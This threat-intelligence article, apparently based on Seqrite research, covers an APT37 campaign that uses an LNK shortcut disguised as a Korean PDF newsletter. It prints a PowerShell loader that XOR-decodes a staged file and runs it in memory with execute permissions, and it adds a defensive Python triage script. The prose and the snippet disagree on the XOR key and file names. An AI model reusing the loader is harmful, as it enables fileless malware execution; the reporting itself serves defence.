Attackers have begun leveraging a seemingly innocuous PDF newsletter alongside a malicious Windows shortcut (LNK) file to infiltrate enterprise environments.
The attack surfaced in late August 2025, targeting South Korean academic and government institutions under the guise of a legitimate “국가정보연구회 소식지 (52호)” PDF newsletter.
Victims receive an archive containing both the PDF decoy and a companion .lnk file masquerading as the newsletter. When the shortcut is executed, a multi-stage PowerShell loader embedded within the LNK unpacks and deploys additional payloads entirely in memory, evading disk-based detection.
Early analysis revealed that the LNK file hides three binary payloads at precise offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a final executable at 0x0015AED2.
Upon execution, a PowerShell one-liner within the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, and then kicks off a batch script (aio03.bat) to decode and run the loader.
Seqrite analysts noted that this fileless approach allows the attackers to bypass signature-based defenses by never writing the ultimate payload to disk.
Subsequent investigation by Seqrite researchers identified that the final payload, once decrypted with a single-byte XOR key (0x35), is injected directly into memory via the Windows API calls GlobalAlloc, VirtualProtect, and CreateThread.
This reflective DLL injection technique ensures that the malicious code executes in a stealthy manner, leaving minimal forensic artifacts.
Detailed reverse engineering of the loader binary uncovered environment checks for VMware tools and sandbox evasion routines that prevent execution in analysis environments, confirming the high sophistication of the threat actor known as APT37.
```powershell
# Loader stage as reported: read the staged blob from %TEMP%, XOR-decode it, and run it in memory
$exePath = "$env:temp\tony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
    $exeFile[$i] = $exeFile[$i] -bxor $key   # single-byte XOR decode
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)              # buffer for the decoded image
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)  # 0x40 = PAGE_EXECUTE_READWRITE
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)          # copy the payload into the buffer
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)                   # execute it on a new thread
```
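A defender-side triage script for shortcuts of this kind, added here as an example and not part of the Seqrite analysis or the attacker tooling: it validates the MS-SHLLINK header, locates any plaintext PDF or PE image appended after it (the page reports payloads at 0x102C, 0x7EDC1 and 0x15AED2), and tries every single-byte XOR key, such as the reported 0x35, looking for an encoded PE header. The sample blob in build_sample() is constructed; its e_lfanew of 0x40 and the filler sizes are assumptions, not values from the real sample.

```python
import re
import struct

# MS-SHLLINK: a .lnk starts with HeaderSize 0x4C and the ShellLink CLSID.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
PDF_RE = re.compile(rb"%PDF-\d\.\d")
MZ_RE = re.compile(rb"MZ")

def is_lnk(data: bytes) -> bool:
    return data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID

def _pe_at(data: bytes, off: int, key: int = 0) -> bool:
    """True if a PE header (XOR-encoded with key, 0 = plain) starts at off."""
    if off + 0x40 > len(data) or data[off] ^ key != 0x4D or data[off + 1] ^ key != 0x5A:
        return False
    e_lfanew = struct.unpack_from("<I", bytes(b ^ key for b in data[off + 0x3C:off + 0x40]))[0]
    pe = off + e_lfanew
    return e_lfanew <= 0x1000 and pe + 4 <= len(data) and bytes(b ^ key for b in data[pe:pe + 4]) == b"PE\x00\x00"

def find_plain_payloads(data: bytes, start: int = LNK_HEADER_SIZE) -> list:
    """(offset, kind) of unencoded PDF and PE images sitting after the shortcut header."""
    hits = [(m.start(), "pdf") for m in PDF_RE.finditer(data, start)]
    hits += [(m.start(), "pe") for m in MZ_RE.finditer(data, start) if _pe_at(data, m.start())]
    return sorted(hits)

def find_xor_pe(data: bytes, start: int = LNK_HEADER_SIZE) -> list:
    """(offset, key) for every single-byte XOR key under which a PE header appears."""
    hits = []
    for key in range(1, 256):
        needle = bytes([0x4D ^ key, 0x5A ^ key])  # 'MZ' as it looks once encoded
        off = data.find(needle, start)
        while off != -1:
            if _pe_at(data, off, key):
                hits.append((off, key))
            off = data.find(needle, off + 1)
    return hits

def triage(data: bytes) -> dict:
    return {"is_lnk": is_lnk(data), "size": len(data),
            "plain": find_plain_payloads(data), "xor_pe": find_xor_pe(data)}

def build_sample() -> bytes:
    """Constructed stand-in for the malicious shortcut: header, decoy PDF, XOR(0x35)-encoded PE stub."""
    header = b"\x4c\x00\x00\x00" + LNK_CLSID + b"\x00" * (LNK_HEADER_SIZE - 20)
    pdf = b"%PDF-1.7\n%decoy\n"
    pe = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x90" * 16
    return header + b"\x41" * 100 + pdf + b"\x42" * 50 + bytes(b ^ 0x35 for b in pe)
if __name__ == "__main__":
    print(triage(build_sample()))  # {'is_lnk': True, 'size': 326, 'plain': [(176, 'pdf')], 'xor_pe': [(242, 53)]}
```

On a real sample, a shortcut hundreds of kilobytes long with a PDF or PE signature after the header is by itself a strong indicator; the XOR hits give the key to carve the payload for analysis.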
Infection Mechanism
The infection begins when the user double-clicks the deceptive .lnk file, which triggers PowerShell under the hood.
The script parses its own binary content using Get-Item and ReadAllBytes, extracting the decoy PDF for display while staging the real payloads.
Once staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script stored in aio02.dat, which in turn orchestrates the XOR decryption and reflective injection of aio01.dat.
By leveraging in-memory execution, the attackers sidestep conventional endpoint protection platforms that rely on disk-based scanning.
This layered infection chain, combining decoy documents, embedded payloads, and fileless techniques, underlines the evolving sophistication of state-sponsored cyber espionage campaigns.